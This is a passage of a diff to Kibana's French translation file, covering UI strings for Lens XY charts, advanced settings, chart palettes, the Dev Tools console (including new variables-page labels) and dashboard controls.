limites de données", - "xpack.lens.xyChart.axisExtent.full": "Plein", - "xpack.lens.xyChart.axisExtent.label": "Limites", - "xpack.lens.xyChart.axisOrientation.angled": "En angle", - "xpack.lens.xyChart.axisOrientation.horizontal": "Horizontal", - "xpack.lens.xyChart.axisOrientation.label": "Orientation", - "xpack.lens.xyChart.axisOrientation.vertical": "Vertical", - "xpack.lens.xyChart.axisSide.auto": "Auto", - "xpack.lens.xyChart.axisSide.bottom": "Bas", - "xpack.lens.xyChart.axisSide.label": "Côté de l'axe", - "xpack.lens.xyChart.axisSide.left": "Gauche", - "xpack.lens.xyChart.axisSide.right": "Droite", - "xpack.lens.xyChart.axisSide.top": "Haut", - "xpack.lens.xyChart.bottomAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe du bas est activé.", - "xpack.lens.xyChart.bottomAxisLabel": "Axe du bas", - "xpack.lens.xyChart.boundaryError": "La limite inférieure doit être plus grande que la limite supérieure", - "xpack.lens.xyChart.curveStyleLabel": "Courbes", - "xpack.lens.xyChart.defaultAnnotationLabel": "Événement", - "xpack.lens.xyChart.defaultRangeAnnotationLabel": "Plage d'événements", - "xpack.lens.xyChart.endValuesLabel": "Valeurs de fin", - "xpack.lens.xyChart.fill.above": "Au-dessus", - "xpack.lens.xyChart.fill.after": "Après", - "xpack.lens.xyChart.fill.before": "Avant", - "xpack.lens.xyChart.fill.below": "En dessous", - "xpack.lens.xyChart.fill.label": "Remplir", - "xpack.lens.xyChart.fill.none": "Aucun", - "xpack.lens.xyChart.fillOpacityLabel": "Opacité de remplissage", - "xpack.lens.xyChart.fillStyle": "Remplir", - "xpack.lens.xyChart.fillStyle.inside": "Intérieur", - "xpack.lens.xyChart.fillStyle.outside": "Extérieur", - "xpack.lens.xyChart.Gridlines": "Quadrillage", - "xpack.lens.xyChart.horizontalAxisLabel": "Axe horizontal", - "xpack.lens.xyChart.horizontalLeftAxisLabel": "Axe supérieur horizontal", - "xpack.lens.xyChart.horizontalRightAxisLabel": "Axe inférieur horizontal", - "xpack.lens.xyChart.iconSelect.alertIconLabel": 
"Alerte", - "xpack.lens.xyChart.iconSelect.asteriskIconLabel": "Astérisque", - "xpack.lens.xyChart.iconSelect.bellIconLabel": "Cloche", - "xpack.lens.xyChart.iconSelect.boltIconLabel": "Éclair", - "xpack.lens.xyChart.iconSelect.bugIconLabel": "Bug", - "xpack.lens.xyChart.iconSelect.circleIconLabel": "Cercle", - "xpack.lens.xyChart.iconSelect.commentIconLabel": "Commentaire", - "xpack.lens.xyChart.iconSelect.flagIconLabel": "Drapeau", - "xpack.lens.xyChart.iconSelect.heartLabel": "Cœur", - "xpack.lens.xyChart.iconSelect.mapMarkerLabel": "Repère", - "xpack.lens.xyChart.iconSelect.mapPinLabel": "Punaise", - "xpack.lens.xyChart.iconSelect.noIconLabel": "Aucun", - "xpack.lens.xyChart.iconSelect.starLabel": "Étoile", - "xpack.lens.xyChart.iconSelect.tagIconLabel": "Balise", - "xpack.lens.xyChart.iconSelect.triangleIconLabel": "Triangle", - "xpack.lens.xyChart.inclusiveZero": "Les limites doivent inclure zéro.", - "xpack.lens.xyChart.layerAnnotationsLabel": "Annotations", - "xpack.lens.xyChart.layerReferenceLineLabel": "Lignes de référence", - "xpack.lens.xyChart.leftAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe de gauche est activé.", - "xpack.lens.xyChart.leftAxisLabel": "Axe de gauche", - "xpack.lens.xyChart.legendLocation.inside": "Intérieur", - "xpack.lens.xyChart.legendLocation.outside": "Extérieur", - "xpack.lens.xyChart.legendVisibility.auto": "Auto", - "xpack.lens.xyChart.legendVisibility.hide": "Masquer", - "xpack.lens.xyChart.legendVisibility.show": "Afficher", - "xpack.lens.xyChart.lineColor.label": "Couleur", - "xpack.lens.xyChart.lineMarker.auto": "Auto", - "xpack.lens.xyChart.lineMarker.icon": "Décoration de l’icône", - "xpack.lens.xyChart.lineMarker.position": "Position de la décoration", - "xpack.lens.xyChart.lineMarker.textVisibility.name": "Nom", - "xpack.lens.xyChart.lineMarker.textVisibility.none": "Aucun", - "xpack.lens.xyChart.lineStyle.dashed": "Tirets", - "xpack.lens.xyChart.lineStyle.dotted": "Pointillé", - 
"xpack.lens.xyChart.lineStyle.label": "Ligne", - "xpack.lens.xyChart.lineStyle.solid": "Uni", - "xpack.lens.xyChart.markerPosition.above": "Haut", - "xpack.lens.xyChart.markerPosition.below": "Bas", - "xpack.lens.xyChart.markerPosition.left": "Gauche", - "xpack.lens.xyChart.markerPosition.right": "Droite", - "xpack.lens.xyChart.missingValuesLabel": "Valeurs manquantes", - "xpack.lens.xyChart.missingValuesLabelHelpText": "Par défaut, les graphiques en aires et en courbes masquent les blancs entre les données. Pour remplir le blanc, effectuez une sélection.", - "xpack.lens.xyChart.missingValuesStyle": "Afficher sous la forme d’une ligne pointillée", - "xpack.lens.xyChart.nestUnderRoot": "Ensemble de données entier", - "xpack.lens.xyChart.placement": "Placement", - "xpack.lens.xyChart.rightAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe de droite est activé.", - "xpack.lens.xyChart.rightAxisLabel": "Axe de droite", - "xpack.lens.xyChart.scaleLinear": "Linéaire", - "xpack.lens.xyChart.scaleLog": "Logarithmique", - "xpack.lens.xyChart.scaleSquare": "Racine carrée", - "xpack.lens.xyChart.seriesColor.auto": "Auto", - "xpack.lens.xyChart.seriesColor.label": "Couleur de la série", - "xpack.lens.xyChart.setScale": "Échelle de l'axe", - "xpack.lens.xyChart.showEnzones": "Afficher les marqueurs de données partielles", - "xpack.lens.xyChart.splitSeries": "Répartir par", - "xpack.lens.xyChart.tickLabels": "Étiquettes de graduation", - "xpack.lens.xyChart.topAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe du haut est activé.", - "xpack.lens.xyChart.topAxisLabel": "Axe du haut", - "xpack.lens.xyChart.valuesHistogramDisabledHelpText": "Ce paramètre ne peut pas être modifié dans les histogrammes.", - "xpack.lens.xyChart.valuesPercentageDisabledHelpText": "Ce paramètre ne peut pas être modifié dans les graphiques en aires à pourcentages.", - "xpack.lens.xyChart.valuesStackedDisabledHelpText": "Ce paramètre ne peut pas être modifié 
dans les graphiques empilés ou les graphiques à barres à pourcentages", - "xpack.lens.xyChart.verticalAxisLabel": "Axe vertical", - "xpack.lens.xyChart.verticalLeftAxisLabel": "Axe gauche vertical", - "xpack.lens.xyChart.verticalRightAxisLabel": "Axe droit vertical", - "xpack.lens.xySuggestions.asPercentageTitle": "Pourcentage", - "xpack.lens.xySuggestions.barChartTitle": "Graphique à barres", - "xpack.lens.xySuggestions.dateSuggestion": "{yTitle} sur {xTitle}", - "xpack.lens.xySuggestions.emptyAxisTitle": "(vide)", - "xpack.lens.xySuggestions.flipTitle": "Retourner", - "xpack.lens.xySuggestions.lineChartTitle": "Graphique linéaire", - "xpack.lens.xySuggestions.nonDateSuggestion": "{yTitle} de {xTitle}", - "xpack.lens.xySuggestions.stackedChartTitle": "Empilé", - "xpack.lens.xySuggestions.unstackedChartTitle": "Non empilé", - "xpack.lens.xySuggestions.yAxixConjunctionSign": " & ", - "xpack.lens.xyVisualization.areaLabel": "Zone", - "xpack.lens.xyVisualization.arrayValues": "{label} contient des valeurs de tableau. Le rendu de votre visualisation peut ne pas se présenter comme attendu.", - "xpack.lens.xyVisualization.barGroupLabel": "Barre", - "xpack.lens.xyVisualization.barHorizontalFullLabel": "Horizontal à barres", - "xpack.lens.xyVisualization.barHorizontalLabel": "H. 
Barres", - "xpack.lens.xyVisualization.barLabel": "Vertical à barres", - "xpack.lens.xyVisualization.dataFailureSplitLong": "{layers, plural, one {Le calque} other {Les calques}} {layersList} {layers, plural, one {requiert} other {requièrent}} un champ pour {axis}.", - "xpack.lens.xyVisualization.dataFailureSplitShort": "{axis} manquant.", - "xpack.lens.xyVisualization.dataFailureYLong": "{layers, plural, one {Le calque} other {Les calques}} {layersList} {layers, plural, one {requiert} other {requièrent}} un champ pour {axis}.", - "xpack.lens.xyVisualization.dataFailureYShort": "{axis} manquant.", - "xpack.lens.xyVisualization.dataTypeFailureXLong": "Non-correspondance des types de données pour {axis}. Impossible de mélanger les types d'intervalle date et nombre.", - "xpack.lens.xyVisualization.dataTypeFailureXOrdinalLong": "Non-correspondance de type de données pour {axis}, utilisez une autre fonction.", - "xpack.lens.xyVisualization.dataTypeFailureXShort": "Type de données incorrect pour {axis}.", - "xpack.lens.xyVisualization.dataTypeFailureYLong": "La dimension {label} fournie pour {axis} possède un type de données incorrect. Nombre attendu mais possède {dataType}", - "xpack.lens.xyVisualization.dataTypeFailureYShort": "Type de données incorrect pour {axis}.", - "xpack.lens.xyVisualization.lineGroupLabel": "Linéaire et en aires", - "xpack.lens.xyVisualization.lineLabel": "Ligne", - "xpack.lens.xyVisualization.mixedBarHorizontalLabel": "Horizontal à barres mixte", - "xpack.lens.xyVisualization.mixedLabel": "XY mixte", - "xpack.lens.xyVisualization.stackedAreaLabel": "En aires empilées", - "xpack.lens.xyVisualization.stackedBarHorizontalFullLabel": "Horizontal à barres empilées", - "xpack.lens.xyVisualization.stackedBarHorizontalLabel": "H. 
À barres empilées", - "xpack.lens.xyVisualization.stackedBarLabel": "Vertical à barres empilées", - "xpack.lens.xyVisualization.stackedPercentageAreaLabel": "En aires à pourcentages", - "xpack.lens.xyVisualization.stackedPercentageBarHorizontalFullLabel": "Horizontal à barres à pourcentages", - "xpack.lens.xyVisualization.stackedPercentageBarHorizontalLabel": "H. À barres à pourcentages", - "xpack.lens.xyVisualization.stackedPercentageBarLabel": "Vertical à barres à pourcentages", - "xpack.lens.xyVisualization.xyLabel": "XY", + "advancedSettings.field.changeImageLinkAriaLabel": "Modifier {ariaName}", + "advancedSettings.field.defaultValueText": "Valeur par défaut : {value}", + "advancedSettings.field.defaultValueTypeJsonText": "Valeur par défaut : {value}", + "advancedSettings.field.deprecationClickAreaLabel": "Cliquez ici pour afficher la documentation de déclassement pour {settingName}.", + "advancedSettings.field.resetToDefaultLinkAriaLabel": "Réinitialiser {ariaName} à la valeur par défaut", + "advancedSettings.form.countOfSettingsChanged": "{unsavedCount} {unsavedCount, plural, one {paramètre non enregistré} other {paramètres non enregistrés} }{hiddenCount, plural, =0 {masqué} other {, # masqués} }.", + "advancedSettings.form.noSearchResultText": "Aucun paramètre trouvé pour {queryText}. {clearSearch}", + "advancedSettings.form.searchResultText": "Les termes de la recherche masquent {settingsCount} paramètres {clearSearch}", + "advancedSettings.voiceAnnouncement.noSearchResultScreenReaderMessage": "Il existe {optionLenght, plural, one {# option} other {# options}} dans {sectionLenght, plural, one {# section} other {# sections}}.", + "advancedSettings.voiceAnnouncement.searchResultScreenReaderMessage": "Vous avez recherché {query}. 
Il existe {optionLenght, plural, one {# option} other {# options}} dans {sectionLenght, plural, one {# section} other {# sections}}.", "advancedSettings.advancedSettingsLabel": "Paramètres avancés", "advancedSettings.badge.readOnly.text": "Lecture seule", "advancedSettings.badge.readOnly.tooltip": "Impossible d’enregistrer les paramètres avancés", "advancedSettings.callOutCautionDescription": "Soyez prudent, ces paramètres sont destinés aux utilisateurs très avancés uniquement. Toute modification est susceptible d’entraîner des dommages importants à Kibana. Certains de ces paramètres peuvent être non documentés, non compatibles ou en version d'évaluation technique. Lorsqu’un champ dispose d’une valeur par défaut, le laisser vide entraîne l’application de cette valeur par défaut, ce qui peut ne pas être acceptable compte tenu d’autres directives de configuration. Toute suppression d'un paramètre personnalisé de la configuration de Kibana est définitive.", - "advancedSettings.callOutCautionTitle": "Attention : toute action est susceptible de provoquer des dommages.", + "advancedSettings.callOutCautionTitle": "Attention : toute action est susceptible de provoquer des dommages.", "advancedSettings.categoryNames.dashboardLabel": "Tableau de bord", "advancedSettings.categoryNames.discoverLabel": "Discover", "advancedSettings.categoryNames.generalLabel": "Général", 
@@ -1034,54 +103,34 @@ "advancedSettings.categoryNames.timelionLabel": "Timelion", "advancedSettings.categoryNames.visualizationsLabel": "Visualisations", "advancedSettings.categorySearchLabel": "Catégorie", - "advancedSettings.featureCatalogueTitle": "Personnalisez votre expérience Kibana : modifiez le format de date, activez le mode sombre, et bien plus encore.", - "advancedSettings.field.changeImageLinkAriaLabel": "Modifier {ariaName}", + "advancedSettings.featureCatalogueTitle": "Personnalisez votre expérience Kibana : modifiez le format de date, activez le mode sombre, et bien plus encore.", "advancedSettings.field.changeImageLinkText": "Modifier l'image", - "advancedSettings.field.codeEditorSyntaxErrorMessage": "Syntaxe JSON non valide", + "advancedSettings.field.codeEditorSyntaxErrorMessage": "Syntaxe JSON non valide", "advancedSettings.field.customSettingAriaLabel": "Paramètre personnalisé", "advancedSettings.field.customSettingTooltip": "Paramètre personnalisé", - "advancedSettings.field.defaultValueText": "Valeur par défaut : {value}", - "advancedSettings.field.defaultValueTypeJsonText": "Valeur par défaut : {value}", - "advancedSettings.field.deprecationClickAreaLabel": "Cliquez ici pour afficher la documentation de déclassement pour {settingName}.", "advancedSettings.field.helpText": "Ce paramètre est défini par le serveur Kibana et ne peut pas être modifié.", "advancedSettings.field.imageChangeErrorMessage": "Impossible d’enregistrer l'image", "advancedSettings.field.invalidIconLabel": "Non valide", "advancedSettings.field.offLabel": "Désactivé", "advancedSettings.field.onLabel": "Activé", - "advancedSettings.field.resetToDefaultLinkAriaLabel": "Réinitialiser {ariaName} à la valeur par défaut", "advancedSettings.field.resetToDefaultLinkText": "Réinitialiser à la valeur par défaut", "advancedSettings.field.settingIsUnsaved": "Le paramètre n'est actuellement pas enregistré.", "advancedSettings.field.unsavedIconLabel": "Non enregistré", 
"advancedSettings.form.cancelButtonLabel": "Annuler les modifications", "advancedSettings.form.clearNoSearchResultText": "(effacer la recherche)", "advancedSettings.form.clearSearchResultText": "(effacer la recherche)", - "advancedSettings.form.countOfSettingsChanged": "{unsavedCount} {unsavedCount, plural, one {paramètre non enregistré} other {paramètres non enregistrés} }{hiddenCount, plural, =0 {masqué} other {, # masqués} }.", - "advancedSettings.form.noSearchResultText": "Aucun paramètre trouvé pour {queryText}. {clearSearch}", "advancedSettings.form.requiresPageReloadToastButtonLabel": "Actualiser la page", "advancedSettings.form.requiresPageReloadToastDescription": "Un ou plusieurs paramètres nécessitent d’actualiser la page pour pouvoir prendre effet.", "advancedSettings.form.saveButtonLabel": "Enregistrer les modifications", "advancedSettings.form.saveButtonTooltipWithInvalidChanges": "Corrigez les paramètres non valides avant d'enregistrer.", "advancedSettings.form.saveErrorMessage": "Enregistrement impossible", - "advancedSettings.form.searchResultText": "Les termes de la recherche masquent {settingsCount} paramètres {clearSearch}", "advancedSettings.pageTitle": "Paramètres", "advancedSettings.searchBar.unableToParseQueryErrorMessage": "Impossible d'analyser la requête", "advancedSettings.searchBarAriaLabel": "Rechercher dans les paramètres avancés", "advancedSettings.voiceAnnouncement.ariaLabel": "Informations de résultat des paramètres avancés", - "advancedSettings.voiceAnnouncement.noSearchResultScreenReaderMessage": "Il existe {optionLenght, plural, one {# option} other {# options}} dans {sectionLenght, plural, one {# section} other {# sections}}.", - "advancedSettings.voiceAnnouncement.searchResultScreenReaderMessage": "Vous avez recherché {query}. 
Il existe {optionLenght, plural, one {# option} other {# options}} dans {sectionLenght, plural, one {# section} other {# sections}}.", - "alerts.documentationTitle": "Afficher la documentation", - "alerts.noPermissionsMessage": "Pour consulter les alertes, vous devez disposer de privilèges pour la fonctionnalité Alertes dans l'espace Kibana. Pour en savoir plus, contactez votre administrateur Kibana.", - "alerts.noPermissionsTitle": "Privilèges de fonctionnalité Kibana requis", - "autocomplete.fieldRequiredError": "Ce champ ne peut pas être vide.", - "autocomplete.invalidDateError": "Date non valide", - "autocomplete.invalidNumberError": "Nombre non valide", - "autocomplete.loadingDescription": "Chargement...", - "autocomplete.selectField": "Veuillez d'abord sélectionner un champ...", - "bfetch.disableBfetch": "Désactiver la mise en lots de requêtes", - "bfetch.disableBfetchCompression": "Désactiver la compression par lots", - "bfetch.disableBfetchCompressionDesc": "Vous pouvez désactiver la compression par lots. Cela permet de déboguer des requêtes individuelles, mais augmente la taille des réponses.", - "bfetch.disableBfetchDesc": "Désactive la mise en lot des requêtes. Cette option augmente le nombre de requêtes HTTP depuis Kibana, mais permet de les déboguer individuellement.", "charts.advancedSettings.visualization.colorMappingText": "Mappe des valeurs à des couleurs spécifiques dans les graphiques avec la palette Compatibilité.", + "charts.colorPicker.setColor.screenReaderDescription": "Définir la couleur pour la valeur {legendDataLabel}", + "charts.functions.palette.args.colorHelpText": "Les couleurs de la palette. 
Accepte un nom de couleur {html}, {hex}, {hsl}, {hsla}, {rgb} ou {rgba}.", "charts.advancedSettings.visualization.colorMappingTextDeprecation": "Ce paramètre est déclassé et ne sera plus compatible avec les futures versions.", "charts.advancedSettings.visualization.colorMappingTitle": "Mapping des couleurs", "charts.advancedSettings.visualization.useLegacyTimeAxis.description": "Active l'axe de temps hérité pour les graphiques dans Lens, Discover, Visualize et TSVB", @@ -1093,11 +142,9 @@ "charts.colormaps.redsText": "Rouges", "charts.colormaps.yellowToRedText": "Jaune à rouge", "charts.colorPicker.clearColor": "Réinitialiser la couleur", - "charts.colorPicker.setColor.screenReaderDescription": "Définir la couleur pour la valeur {legendDataLabel}", "charts.countText": "Décompte", - "charts.functions.palette.args.colorHelpText": "Les couleurs de la palette. Accepte un nom de couleur {html}, {hex}, {hsl}, {hsla}, {rgb} ou {rgba}.", - "charts.functions.palette.args.gradientHelpText": "Concevoir une palette de dégradés lorsque c'est possible ?", - "charts.functions.palette.args.reverseHelpText": "Inverser la palette ?", + "charts.functions.palette.args.gradientHelpText": "Concevoir une palette de dégradés lorsque c'est possible ?", + "charts.functions.palette.args.reverseHelpText": "Inverser la palette ?", "charts.functions.palette.args.stopHelpText": "La couleur à laquelle s’arrête la palette. Si utilisé, doit être associé à chaque couleur.", "charts.functions.paletteHelpText": "Crée une palette de couleurs.", "charts.functions.systemPalette.args.nameHelpText": "Nom de la palette dans la liste des palettes", 
@@ -1117,6 +164,7 @@ "charts.palettes.temperatureLabel": "Température", "charts.palettes.warmLabel": "Chaude", "charts.partialData.bucketTooltipText": "La plage temporelle sélectionnée n'inclut pas ce compartiment en entier. Il se peut qu'elle contienne des données partielles.", + "coloring.dynamicColoring.customPalette.rangeAriaLabel": "Gamme {index}", "coloring.dynamicColoring.customPalette.addColor": "Ajouter une couleur", "coloring.dynamicColoring.customPalette.addColorAriaLabel": "Ajouter une couleur", "coloring.dynamicColoring.customPalette.colorStopsHelpPercentage": "Les types de valeurs en pourcentage sont relatifs à la plage complète des valeurs de données disponibles.", @@ -1130,7 +178,6 @@ "coloring.dynamicColoring.customPalette.maxValuePlaceholder": "Valeur max.", "coloring.dynamicColoring.customPalette.minValuePlaceholder": "Valeur min.", "coloring.dynamicColoring.customPalette.oneColorRange": "Nécessite plus d’une couleur.", - "coloring.dynamicColoring.customPalette.rangeAriaLabel": "Gamme {index}", "coloring.dynamicColoring.customPalette.reverseColors": "Inverser les couleurs", "coloring.dynamicColoring.customPalette.selectNewColor": "Sélectionner une nouvelle couleur", "coloring.dynamicColoring.customPalette.setCustomMaxValue": "Définir une valeur minimum personnalisée", 
@@ -1143,6 +190,11 @@ "coloring.dynamicColoring.rangeType.label": "Type de valeur", "coloring.dynamicColoring.rangeType.number": "Numéro", "coloring.dynamicColoring.rangeType.percent": "Pourcent", + "console.helpPage.learnAboutConsoleAndQueryDslText": "Découvrez plus d'informations sur {console} et {queryDsl}", + "console.historyPage.itemOfRequestListAriaLabel": "Requête : {historyItem}", + "console.settingsPage.refreshInterval.everyNMinutesTimeInterval": "Toutes les {value} {value, plural, one {minute} other {minutes}}", + "console.variablesPage.descriptionText": "Définir les variables et les utiliser dans vos requêtes sous la forme {variable}.", + "console.variablesPage.descriptionText.variableNameText": "{variableName}", "console.autocomplete.addMethodMetaText": "méthode", "console.consoleDisplayName": "Console", "console.consoleMenu.copyAsCurlFailedMessage": "Impossible de copier la requête en tant que cURL", 
@@ -1154,14 +206,14 @@ "console.deprecations.proxyConfig.manualStepOneMessage": "Ouvrez le fichier de configuration kibana.yml.", "console.deprecations.proxyConfig.manualStepThreeMessage": "Configurez la connexion sécurisée entre Kibana et Elasticsearch à l'aide des paramètres \"server.ssl.*\".", "console.deprecations.proxyConfig.manualStepTwoMessage": "Supprimez le paramètre \"console.proxyConfig\".", - "console.deprecations.proxyConfigMessage": "La configuration de \"console.proxyConfig\" est déclassée et sera supprimée dans la version 8.0.0. Pour sécuriser votre connexion entre Kibana et Elasticsearch, utilisez les paramètres \"server.ssl.*\" standards.", + "console.deprecations.proxyConfigMessage": "La configuration de \"console.proxyConfig\" est déclassée et sera supprimée dans la version 8.0.0. Pour sécuriser votre connexion entre Kibana et Elasticsearch, utilisez les paramètres \"server.ssl.*\" standards.", "console.deprecations.proxyConfigTitle": "Le paramètre \"console.proxyConfig\" est déclassé", "console.deprecations.proxyFilter.manualStepOneMessage": "Ouvrez le fichier de configuration kibana.yml.", "console.deprecations.proxyFilter.manualStepThreeMessage": "Configurez la connexion sécurisée entre Kibana et Elasticsearch à l'aide des paramètres \"server.ssl.*\".", "console.deprecations.proxyFilter.manualStepTwoMessage": "Supprimez le paramètre \"console.proxyFilter\".", - "console.deprecations.proxyFilterMessage": "La configuration de \"console.proxyFilter\" est déclassée et sera supprimée dans la version 8.0.0. Pour sécuriser votre connexion entre Kibana et Elasticsearch, utilisez les paramètres \"server.ssl.*\" standards.", + "console.deprecations.proxyFilterMessage": "La configuration de \"console.proxyFilter\" est déclassée et sera supprimée dans la version 8.0.0. 
Pour sécuriser votre connexion entre Kibana et Elasticsearch, utilisez les paramètres \"server.ssl.*\" standards.", "console.deprecations.proxyFilterTitle": "Le paramètre \"console.proxyFilter\" est déclassé", - "console.devToolsDescription": "Plutôt que l’interface cURL, utilisez une interface JSON pour exploiter vos données dans la console.", + "console.devToolsDescription": "Plutôt que l’interface cURL, utilisez une interface JSON pour exploiter vos données dans la console.", "console.devToolsTitle": "Interagir avec l'API Elasticsearch", "console.exampleOutputTextarea": "Outils de développement de la console - Exemple d’éditeur", "console.helpPage.keyboardCommands.autoIndentDescription": "Appliquer un retrait automatique à la requête en cours", @@ -1176,14 +228,12 @@ "console.helpPage.keyboardCommands.submitRequestDescription": "Envoyer la requête", "console.helpPage.keyboardCommands.switchFocusToAutoCompleteMenuDescription": "Permet d’accéder au menu de saisie semi-automatique. Utilisez les flèches pour sélectionner un terme.", "console.helpPage.keyboardCommandsTitle": "Commandes du clavier", - "console.helpPage.learnAboutConsoleAndQueryDslText": "Découvrez plus d'informations sur {console} et {queryDsl}", "console.helpPage.pageTitle": "Aide", "console.helpPage.requestFormatDescription": "Vous pouvez saisir une ou plusieurs requêtes dans l'éditeur. La console est compatible avec les requêtes dans un format compact.", "console.helpPage.requestFormatTitle": "Format de la requête", "console.historyPage.applyHistoryButtonLabel": "Appliquer", "console.historyPage.clearHistoryButtonLabel": "Effacer", "console.historyPage.closehistoryButtonLabel": "Fermer", - "console.historyPage.itemOfRequestListAriaLabel": "Requête : {historyItem}", "console.historyPage.noHistoryTextMessage": "Aucun historique disponible", "console.historyPage.pageTitle": "Historique", "console.historyPage.requestListAriaLabel": "Historique des requêtes envoyées", 
@@ -1215,14 +265,13 @@ "console.settingsPage.fontSizeLabel": "Taille de la police", "console.settingsPage.historyLabel": "Historique", "console.settingsPage.indicesAndAliasesLabelText": "Index et alias", - "console.settingsPage.jsonSyntaxLabel": "Syntaxe JSON", + "console.settingsPage.jsonSyntaxLabel": "Syntaxe JSON", "console.settingsPage.keyboardShortcutsLabel": "Raccourcis clavier", "console.settingsPage.pageTitle": "Paramètres de la console", "console.settingsPage.refreshButtonLabel": "Actualiser les suggestions de saisie semi-automatique", "console.settingsPage.refreshingDataDescription": "La console actualise les suggestions de saisie semi-automatique en interrogeant Elasticsearch. Une actualisation moins fréquente est recommandée pour réduire les coûts de bande passante.", "console.settingsPage.refreshingDataLabel": "Fréquence d'actualisation", "console.settingsPage.refreshInterval.everyHourTimeInterval": "Toutes les heures", - "console.settingsPage.refreshInterval.everyNMinutesTimeInterval": "Toutes les {value} {value, plural, one {minute} other {minutes}}", "console.settingsPage.refreshInterval.onceTimeInterval": "Une fois, au chargement de la console", "console.settingsPage.saveButtonLabel": "Enregistrer", "console.settingsPage.savingRequestsToHistoryMessage": "Désactiver l'enregistrement des requêtes dans l'historique", 
@@ -1236,18 +285,36 @@ "console.topNav.historyTabLabel": "Historique", "console.topNav.settingsTabDescription": "Paramètres", "console.topNav.settingsTabLabel": "Paramètres", + "console.topNav.variablesTabDescription": "Variables", + "console.topNav.variablesTabLabel": "Variables", + "console.variablesPage.addButtonLabel": "Ajouter", + "console.variablesPage.cancelButtonLabel": "Annuler", + "console.variablesPage.pageTitle": "Variables", + "console.variablesPage.saveButtonLabel": "Enregistrer", + "console.variablesPage.variablesTable.columns.valueHeader": "Valeur", + "console.variablesPage.variablesTable.columns.variableHeader": "Nom de la variable", + "console.variablesPage.variablesTable.valueInput.ariaLabel": "Valeur de la variable", + "console.variablesPage.variablesTable.variableInput.ariaLabel": "Nom de la variable", + "console.variablesPage.variablesTable.variableInputError.validCharactersText": "Seuls les chiffres et les lettres sont autorisés", "console.welcomePage.closeButtonLabel": "Rejeter", "console.welcomePage.pageTitle": "Bienvenue dans la console", - "console.welcomePage.quickIntroDescription": "L'interface utilisateur de la console est divisée en deux volets : un volet éditeur (à gauche) et un volet de réponse (à droite). L'éditeur permet de saisir des requêtes et de les envoyer à Elasticsearch, tandis que le volet de réponse affiche les résultats.", + "console.welcomePage.quickIntroDescription": "L'interface utilisateur de la console est divisée en deux volets : un volet éditeur (à gauche) et un volet de réponse (à droite). 
L'éditeur permet de saisir des requêtes et de les envoyer à Elasticsearch, tandis que le volet de réponse affiche les résultats.", "console.welcomePage.quickIntroTitle": "Introduction rapide à l'interface utilisateur", - "console.welcomePage.quickTips.cUrlFormatForRequestsDescription": "Vous pouvez coller des requêtes au format cURL ; elles seront automatiquement traduites dans la syntaxe de la console.", + "console.welcomePage.quickTips.cUrlFormatForRequestsDescription": "Vous pouvez coller des requêtes au format cURL ; elles seront automatiquement traduites dans la syntaxe de la console.", "console.welcomePage.quickTips.keyboardShortcutsDescription": "N’hésitez pas à jeter un œil aux raccourcis clavier sous le bouton Aide. Vous pourriez y trouver des choses utiles.", "console.welcomePage.quickTips.resizeEditorDescription": "Vous pouvez redimensionner les volets de l'éditeur et de réponse en faisant glisser le séparateur situé entre les deux.", "console.welcomePage.quickTips.submitRequestDescription": "Utilisez l’icône de triangle vert pour envoyer vos requêtes à ES.", "console.welcomePage.quickTips.useWrenchMenuDescription": "Cliquez sur l’icône en forme de clé pour découvrir d'autres éléments utiles.", - "console.welcomePage.quickTipsTitle": "Quelques brèves astuces, pendant que j'ai toute votre attention :", + "console.welcomePage.quickTipsTitle": "Quelques brèves astuces, pendant que j'ai toute votre attention :", "console.welcomePage.supportedRequestFormatDescription": "Lors de la saisie d'une requête, la console fera des suggestions que vous pourrez accepter en appuyant sur Entrée/Tab. 
Ces suggestions sont faites en fonction de la structure de la requête, des index et des types.", - "console.welcomePage.supportedRequestFormatTitle": "La console prend en charge les requêtes dans un format compact, tel que le format cURL :", + "console.welcomePage.supportedRequestFormatTitle": "La console prend en charge les requêtes dans un format compact, tel que le format cURL :", + "controls.controlGroup.ariaActions.moveControlButtonAction": "Déplacer le contrôle {controlTitle}", + "controls.optionsList.errors.dataViewNotFound": "Impossible de localiser la vue de données : {dataViewId}", + "controls.optionsList.popover.cardinalityPlaceholder": "Rechercher {totalOptions} {totalOptions, plural, one {option disponible} other {options disponibles}}", + "controls.optionsList.popover.cardinalityTooltip": "{totalOptions} options disponibles.", + "controls.optionsList.popover.invalidSelectionsSectionTitle": "{invalidSelectionCount, plural, one {Sélection ignorée} other {Sélections ignorées}}", + "controls.optionsList.popover.invalidSelectionsTitle": "{invalidSelectionCount} options sélectionnées ignorées", + "controls.optionsList.popover.invalidSelectionsTooltip": "{selectedOptions} {selectedOptions, plural, one {option sélectionnée} other {options sélectionnées}} {selectedOptions, plural, one {est ignorée} other {sont ignorées}}, car {selectedOptions, plural, one {elle n'est plus présente} other {elles ne sont plus présentes}} dans les données.", "controls.controlGroup.emptyState.addControlButtonTitle": "Ajouter un contrôle", "controls.controlGroup.emptyState.badgeText": "Nouveauté", "controls.controlGroup.emptyState.callToAction": "Le filtrage des données s'est amélioré grâce aux contrôles, qui vous permettent d'afficher uniquement les données que vous souhaitez explorer.", 
@@ -1273,18 +340,18 @@ "controls.controlGroup.management.delete": "Supprimer le contrôle", "controls.controlGroup.management.delete.cancel": "Annuler", "controls.controlGroup.management.delete.confirm": "Supprimer", - "controls.controlGroup.management.delete.deleteAllTitle": "Supprimer tous les contrôles ?", - "controls.controlGroup.management.delete.deleteTitle": "Supprimer le contrôle ?", + "controls.controlGroup.management.delete.deleteAllTitle": "Supprimer tous les contrôles ?", + "controls.controlGroup.management.delete.deleteTitle": "Supprimer le contrôle ?", "controls.controlGroup.management.delete.sub": "Une fois supprimés, les contrôles ne peuvent pas être récupérés.", "controls.controlGroup.management.deleteAll": "Tout supprimer", "controls.controlGroup.management.deleteNew.cancel": "Annuler", "controls.controlGroup.management.deleteNew.confirm": "Supprimer le contrôle", - "controls.controlGroup.management.deleteNew.sub": "Les modifications apportées à ce contrôle seront ignorées. Voulez-vous vraiment continuer ?", + "controls.controlGroup.management.deleteNew.sub": "Les modifications apportées à ce contrôle seront ignorées. Voulez-vous vraiment continuer ?", "controls.controlGroup.management.deleteNew.title": "Supprimer le nouveau contrôle", "controls.controlGroup.management.discard.cancel": "Annuler", "controls.controlGroup.management.discard.confirm": "Abandonner les modifications", - "controls.controlGroup.management.discard.sub": 